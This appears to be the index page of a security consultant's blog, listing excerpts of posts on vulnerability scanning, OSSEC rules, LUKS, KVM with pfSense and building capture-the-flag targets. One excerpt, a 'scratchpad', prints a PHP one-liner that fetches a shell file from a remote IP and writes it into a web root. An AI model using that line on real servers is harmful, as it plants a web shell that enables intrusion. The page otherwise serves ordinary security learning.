Vulnerability scanning – Defining a scanning approach
In my working life I have had various roles as security consultant. One of these roles was working in an
Read more
Security
OSSEC creating ‘ignore’ rules
For automated log monitoring and alerting, several years ago I decided to start using OSSEC. The nice thing about OSSEC
Read moreScratchpad – random but interesting
php file transfer Nice PHP Example to transfer code <?php file_put_contents(“/var/www/html/sedje.php”, file_get_contents(“http://10.13.37.152/shell.txt”));?> interactive shell A method for better interactive shell
Read moreKVM Virtualisation and a pfSense firewall
Recently I decided to stop breaking stuff on my web server, dns server and other internal infrastructure. It simply takes
Read more
Password protection for LUKS encrypted laptop
Halfway past November, a vulnerability in the LUKS Full-disk encryption for linux systems was discovered (CVE-2016-4484). Since I use this
Read more
Insecure on purpose – building a CTF-target
Last month I started working on something that feels extremely counter-intuitive. Building targets for a hacking ‘Capture The Flag‘ event.
Read more
Vulnerability scanning – types of scanners and their purpose
When working with scanning tools, you must first determine what type of scanner you are working with. There are several
Read moreVulnerability scanning – how, what where and when?
In my working life I have had various roles as security consultant. One of these roles was working in an
Read moreVulnerability scanning – (re)sources and sites
Vulnerability management (processes) and therefore vulnerability scanning (techniques) are a requirement for any organization that takes security serious. In my
Read moreVisiting the InfoSecurity Conference
As part of my pursuit for more knowledge in the information security field, I visited the InfoSecurity.nl Conference in Utrecht,
Read more